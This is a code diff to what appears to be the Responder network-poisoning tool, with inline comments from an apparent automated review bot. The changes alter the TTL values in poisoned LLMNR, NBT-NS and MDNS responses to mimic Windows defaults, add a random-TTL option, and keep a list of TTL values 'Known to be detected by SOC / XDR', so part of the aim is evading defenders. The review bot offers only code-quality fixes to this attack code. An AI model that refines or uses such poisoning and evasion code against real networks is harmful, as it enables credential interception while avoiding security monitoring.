diff --git a/Responder.py b/Responder.py
index 49fab8e..bbd3c7a 100755
--- a/Responder.py
+++ b/Responder.py
@@ -45,7 +45,7 @@ parser.add_option('-Q','--quiet', action="store_true", help="Tell Resp
 parser.add_option('--lm', action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier. Default: False", dest="LM_On_Off", default=False)
 parser.add_option('--disable-ess', action="store_true", help="Force ESS downgrade. Default: False", dest="NOESS_On_Off", default=False)
 parser.add_option('-v','--verbose', action="store_true", help="Increase verbosity.", dest="Verbose")
-parser.add_option('-t','--ttl', action="store", help="Configure the TTL in the victim cache. Value in hex (30 seconds = 1e)", dest="TTL", metavar="1e", default=None)
+parser.add_option('-t','--ttl', action="store", help="Change the default Windows TTL for poisoned answers. Value in hex (30 seconds = 1e). use '-t random' for random TTL", dest="TTL", metavar="1e", default=None)
 options, args = parser.parse_args()
 
 if not os.geteuid() == 0:
diff --git a/packets.py b/packets.py
index 3ec9dec..bb3134e 100644
--- a/packets.py
+++ b/packets.py
@@ -52,7 +52,7 @@ class NBT_Ans(Packet):
 ("NbtName", ""),
 ("Type", "\x00\x20"),
 ("Classy", "\x00\x01"),
- ("TTL", "\x00\x00\x00\xa5"),
+ ("TTL", "\x00\x04\x93\xe0"), #TTL: 3 days, 11 hours, 20 minutes (Default windows behavior)
 ("Len", "\x00\x06"),
 ("Flags1", "\x00\x00"),
 ("IP", "\x00\x00\x00\x00"),
@@ -263,7 +263,7 @@ class LLMNR_Ans(Packet):
 ("AnswerNameNull", "\x00"),
 ("Type1", "\x00\x01"),
 ("Class1", "\x00\x01"),
- ("TTL", "\x00\x00\x00\x1e"),##Poison for 30 sec.
+ ("TTL", "\x00\x00\x00\x1e"),##Poison for 30 sec (Default windows behavior)
 ("IPLen", "\x00\x04"),
 ("IP", "\x00\x00\x00\x00"),
 ])
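Review bot: The new NBT_Ans default `("TTL", "\x00\x04\x93\xe0")` is a 4-byte big-endian literal whose value the trailing comment states only as a duration, so a reader has to convert the hex by hand to check it; it does equal 300000 seconds, which is the 3d 11h 20m the comment gives. I'd make the comment self-verifying: `# TTL 0x000493E0 = 300000 s = 3d 11h 20m (default Windows behavior)`. The comment-only TTL hunks further down packets.py (0x1e = 30 s, 0x78 = 120 s) would read more consistently in the same `# TTL 0x… = N s` form instead of the `##Poison for …` style.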
@@ -292,7 +292,7 @@ class LLMNR6_Ans(Packet):
 ("AnswerNameNull", "\x00"),
 ("Type1", "\x00\x1c"),
 ("Class1", "\x00\x01"),
- ("TTL", "\x00\x00\x00\x1e"),##Poison for 30 sec.
+ ("TTL", "\x00\x00\x00\x1e"),##Poison for 30 sec (Default windows behavior).
 ("IPLen", "\x00\x04"),
 ("IP", "\x00\x00\x00\x00"),
 ])
@@ -316,7 +316,7 @@ class MDNS_Ans(Packet):
 ("AnswerNameNull", "\x00"),
 ("Type", "\x00\x01"),
 ("Class", "\x00\x01"),
- ("TTL", "\x00\x00\x00\x78"),##Poison for 2mn.
+ ("TTL", "\x00\x00\x00\x78"),##Poison for 2mn (Default windows behavior)
 ("IPLen", "\x00\x04"),
 ("IP", "\x00\x00\x00\x00"),
 ])
@@ -338,7 +338,7 @@ class MDNS6_Ans(Packet):
 ("AnswerNameNull", "\x00"),
 ("Type", "\x00\x1c"),
 ("Class", "\x00\x01"),
- ("TTL", "\x00\x00\x00\x78"),##Poison for 2mn.
+ ("TTL", "\x00\x00\x00\x78"),##Poison for 2mn (Default windows behavior)
 ("IPLen", "\x00\x04"),
 ("IP", "\x00\x00\x00\x00"),
 ])
diff --git a/poisoners/LLMNR.py b/poisoners/LLMNR.py
index e130273..36fe7c3 100755
--- a/poisoners/LLMNR.py
+++ b/poisoners/LLMNR.py
@@ -76,7 +76,11 @@ class LLMNR(BaseRequestHandler): # LLMNR Server class
 })
 
 elif LLMNRType == True: # Poisoning Mode
- Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name, TTL=settings.Config.TTL)
+ #Default:
+ if settings.Config.TTL == None:
+ Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name)
+ else:
+ Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name, TTL=settings.Config.TTL)
 Buffer1.calculate()
 soc.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
 if not settings.Config.Quiet_Mode:
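Review bot: The added `if settings.Config.TTL == None:` tests for `None` with `==`; the identity test `is None` is the idiomatic form (PEP 8) and does not depend on the `__eq__` of whatever object the TTL attribute holds. The `if`/`else` also duplicates the entire `LLMNR_Ans(...)` call just to omit one keyword, so the two copies can drift apart; `ttl_kwargs = {} if settings.Config.TTL is None else {"TTL": settings.Config.TTL}` followed by `Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name, **ttl_kwargs)` keeps a single call site and makes the `#Default:` comment unnecessary. The same `== None` plus duplicated-constructor pattern appears in the second LLMNR.py hunk, both MDNS.py hunks, the NBTNS.py hunk and the utils.py hunk, so the fix should be applied uniformly. The enclosing handler method starts and ends outside this hunk.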
@@ -90,7 +94,11 @@ class LLMNR(BaseRequestHandler): # LLMNR Server class
 })
 
 elif LLMNRType == 'IPv6' and Have_IPv6:
- Buffer1 = LLMNR6_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name, TTL=settings.Config.TTL)
+ #Default:
+ if settings.Config.TTL == None:
+ Buffer1 = LLMNR6_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name)
+ else:
+ Buffer1 = LLMNR6_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name, TTL=settings.Config.TTL)
 Buffer1.calculate()
 soc.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
 if not settings.Config.Quiet_Mode:
diff --git a/poisoners/MDNS.py b/poisoners/MDNS.py
index b1049bc..3ef0c7c 100755
--- a/poisoners/MDNS.py
+++ b/poisoners/MDNS.py
@@ -73,7 +73,11 @@ class MDNS(BaseRequestHandler):
 })
 elif MDNSType == True: # Poisoning Mode
 Poisoned_Name = Poisoned_MDNS_Name(data)
- Buffer = MDNS_Ans(AnswerName = Poisoned_Name, TTL=settings.Config.TTL)
+ #Use default:
+ if settings.Config.TTL == None:
+ Buffer = MDNS_Ans(AnswerName = Poisoned_Name)
+ else:
+ Buffer = MDNS_Ans(AnswerName = Poisoned_Name, TTL=settings.Config.TTL)
 Buffer.calculate()
 soc.sendto(NetworkSendBufferPython2or3(Buffer), self.client_address)
 if not settings.Config.Quiet_Mode:
@@ -85,9 +89,13 @@ class MDNS(BaseRequestHandler):
 'AnalyzeMode': '0',
 })
 
- elif MDNSType == 'IPv6'and Have_IPv6: # Poisoning Mode
+ elif MDNSType == 'IPv6' and Have_IPv6: # Poisoning Mode
 Poisoned_Name = Poisoned_MDNS_Name(data)
- Buffer = MDNS6_Ans(AnswerName = Poisoned_Name)
+ #Use default:
+ if settings.Config.TTL == None:
+ Buffer = MDNS6_Ans(AnswerName = Poisoned_Name)
+ else:
+ Buffer = MDNS6_Ans(AnswerName = Poisoned_Name, TTL= settings.Config.TTL)
 Buffer.calculate()
 soc.sendto(NetworkSendBufferPython2or3(Buffer), self.client_address)
 if not settings.Config.Quiet_Mode:
diff --git a/poisoners/NBTNS.py b/poisoners/NBTNS.py
index 446dc06..ff3a1cd 100755
--- a/poisoners/NBTNS.py
+++ b/poisoners/NBTNS.py
@@ -44,7 +44,10 @@ class NBTNS(BaseRequestHandler):
 'AnalyzeMode': '1',
 })
 else: # Poisoning Mode
- Buffer1 = NBT_Ans(TTL=settings.Config.TTL)
+ if settings.Config.TTL == None:
+ Buffer1 = NBT_Ans()
+ else:
+ Buffer1 = NBT_Ans(TTL=settings.Config.TTL)
 Buffer1.calculate(data)
 socket.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
 if not settings.Config.Quiet_Mode:
diff --git a/settings.py b/settings.py
index ea895f3..bdca9c2 100644
--- a/settings.py
+++ b/settings.py
@@ -175,8 +175,12 @@ class Settings:
 # TTL blacklist. Known to be detected by SOC / XDR
 TTL_blacklist = [b"\x00\x00\x00\x1e", b"\x00\x00\x00\x78", b"\x00\x00\x00\xa5"]
 
- # Random TTL
+ # Lets add a default mode, which uses Windows default TTL for each protocols (set respectively in packets.py)
 if options.TTL is None:
+ self.TTL = None
+
+ # Random TTL
+ elif options.TTL.upper() == "RANDOM":
 TTL = bytes.fromhex("000000"+format(random.randint(10,90),'x'))
 if TTL in TTL_blacklist:
 TTL = int.from_bytes(TTL, "big")+1
diff --git a/utils.py b/utils.py
index b216ca1..8eb15ca 100644
--- a/utils.py
+++ b/utils.py
@@ -559,7 +559,10 @@ def StartupMessage():
 print(' %-27s' % "Don't Respond To" + color(str(settings.Config.DontRespondTo), 5, 1))
 if len(settings.Config.DontRespondToName):
 print(' %-27s' % "Don't Respond To Names" + color(str(settings.Config.DontRespondToName), 5, 1))
- print(' %-27s' % "TTL for poisoned response" + color(str(settings.Config.TTL.encode().hex()) + " ("+ str(int.from_bytes(str.encode(settings.Config.TTL),"big")) +" seconds)", 5, 1))
+ if settings.Config.TTL == None:
+ print(' %-27s' % "TTL for poisoned response "+ color('[default]', 5, 1))
+ else:
+ print(' %-27s' % "TTL for poisoned response" + color(str(settings.Config.TTL.encode().hex()) + " ("+ str(int.from_bytes(str.encode(settings.Config.TTL),"big")) +" seconds)", 5, 1))
 print('')
 print(color("[+] ", 2, 1) + "Current Session Variables:")
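Review bot: In the settings.py hunk the new comment `# Lets add a default mode, which uses Windows default TTL for each protocols (set respectively in packets.py)` is written as a change description rather than as documentation of the code below it; I'd replace it with `# Default mode: leave TTL unset so each packet class falls back to its own per-protocol default from packets.py`. The added `self.TTL = None` also makes `None` a sentinel that every reader of `settings.Config.TTL` must now handle; the poisoners and StartupMessage in this diff do, but any consumer outside the diff that still calls `.encode()` on it, as the old utils.py line did, would raise AttributeError, so a grep for other readers is worth doing before merging. The branch that parses an explicit hex value after `elif options.TTL.upper() == "RANDOM":` lies outside the hunk, so I cannot see how a malformed `-t` value is handled there.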